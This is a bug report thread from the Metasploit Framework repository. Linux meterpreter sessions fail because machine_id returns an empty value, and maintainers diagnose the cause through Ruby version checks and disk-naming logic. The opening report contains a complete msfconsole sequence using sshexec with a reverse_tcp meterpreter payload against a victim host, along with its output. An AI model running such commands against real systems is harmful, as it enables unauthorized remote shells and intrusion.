### ISSUE TITLE
Linux meterpreter session fails if machine_id returns an empty value

### ISSUE THREAD

**Issue by marcbudofsky** [rapid7/metasploit-framework#5338]
Linux x86 meterpreter sessions fail immediately on connection after last update.

**Metasploit Version:** metasploit v4.11.1-2015050601 [core:4.11.1.pre.2015050601 api:1.0.0]
**Attacker:** 192.168.1.Y
**Victim:** 192.168.1.X

```
use exploit/multi/ssh/sshexec
set RHOST 192.168.1.X
set RPORT 22
set USERNAME username
set PASSWORD password
set payload linux/x86/meterpreter/reverse_tcp
setg LHOST 192.168.1.Y
setg LPORT 443
exploit 

[*] Started reverse handler on 192.168.1.Y:443 
[*] 192.168.1.X:22 - Sending stager...
[*] Command Stager progress -  37.22% done (252/677 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1490944 bytes) to 192.168.1.X
[*] Command Stager progress - 100.00% done (677/677 bytes)
[*] Meterpreter session 1 opened (192.168.1.Y:443 -> 192.168.1.X:54722) at 2015-05-12 20:06:39 -0400

meterpreter > 
[-] Meterpreter session 1 is not valid and will be closed

[*] 192.168.1.X - Meterpreter session 1 closed.
```

**Comment by OJ** [comment]
It sounds like your binaries are out of sync with MSF.

Can you please confirm that you've updated to latest code, including `bundle install`, and confirm that you don't have any of the following files on disk:

* `MSF_FOLDER/data/meterpreter/*.lso`
* `MSF_FOLDER/data/meterpreter/*.bin`

Thanks.

**Comment by marcbudofsky** [comment]
Output from ```bundle install```:

```
root@kali:/usr/share/metasploit-framework# bundle install
Fetching gem metadata from https://rubygems.org/.........
Installing rake (10.4.2) 
[cut]
Installing metasploit-concern (0.4.0) 
Gem::InstallError: metasploit-concern requires Ruby version >= 2.1.
An error occured while installing metasploit-concern (0.4.0), and Bundler cannot continue.
Make sure that `gem install metasploit-concern -v '0.4.0'` succeeds before bundling.
```

Ruby version installed is ```ruby 1.9.3p194 (2012-04-20 revision 35410) [i486-linux]```

Files in ```MSF_FOLDER/data/meterpreter/````:

```
root@kali:/usr/share/metasploit-framework/data/meterpreter# ls
ext_server_android.jar    ext_server_pivot.x86.dll  ext_server_stdapi.php  meterpreter.jar  meterpreter.py  metsvc-server.exe
ext_server_pivot.x64.dll  ext_server_stdapi.jar     ext_server_stdapi.py   meterpreter.php  metsvc.exe
```

**Comment by OJ** [comment]
Your ruby version is way out of date mate. you should be running on 2.1.5 at the very least. That won't explain the POSIX session issues, but it's definitely something you should set up.

@bcook-r7 I'm not up to speed with the configuration/etc with Kali, but by now would it be fair to say they should have the new `metasploit-binaries` gem?

**Comment by bcook-r7** [comment]
Yes, this is true, it should come with metasploit-payloads. But, I believe you also have to use the msfupdate that is in your bin path kali so it runs with the correct version of ruby. The system version of ruby on kali is incompatible.

**Comment by OJ** [comment]
Thanks @bcook-r7, I knew you'd have the low-down. Cheers for that.

**Comment by marcbudofsky** [comment]
Gotta love repos being out of date :) Just updated to ```ruby 2.1.6p336 (2015-04-13 revision 50298) [i686-linux]```. ```bundle install``` now runs to completion. 

Output of ```msfupdate```:

```
root@kali:~/oscp/boxes# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
[*] No updates available
```

Metasploit is still throwing the same error as well.

**Comment by bcook-r7** [comment]
Mind sharing what sort of Linux is on the victim side?

**Comment by marcbudofsky** [comment]
```$ uname -a
Linux sean-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux```

I just manually installed ```metasploit-payloads```, but still no luck.

**Comment by bcook-r7** [comment]
Thanks for the info, got it to repro.

**Comment by marcbudofsky** [comment]
Glad to know its not just me :) Let me know if you need any more information!

**Comment by bcook-r7** [comment]
The problem starts last week with the automatic machine_id tracking. 3080feb1881b31bdbbf633d68d824f1f5e00357b - the latest published metasploit-payloads worked fine before that. I'll check it out against #5300 as well.

**Comment by OJ** [comment]
I just did a test with POSIX when working on #5339 and it worked fine.

**Comment by bcook-r7** [comment]
I'm sure it did :) The problem appears to be in how machine_id works currently on posix. It assumes you have a disk that starts with "ata-". An old Linux like, for instance, metasploitable doesn't have any drives like that out of the box. Mine all start with 'dm-'.

That causes the machine_id command to send no actual machine_id, e.g.:
meterpreter > machine_id
[-] Error running command machine_id: TypeError no implicit conversion of nil into String

This appears to get interpreted as a failure by the new code that checks for machine_id at the start of the session and it gets shut down. Solution might be to have a fallback in machine_id for posix, e.g. at least send the hostname even if a suitable drive is not found.

**Comment by bcook-r7** [comment]
Another issue I found (maybe its well known) is that sshexec doesn't work with a new OpenSSH daemon out of the box. It gives a failure to negotiate a key exchange. This led me to try it with metasploitable, where I found the drive name issue with machine_id. The stars aligned just so :)

I was just contemplating machine_id this morning for generalizing posix meterpreter, thinking about how to generate a machine_id on other Unix systems in a portable way.
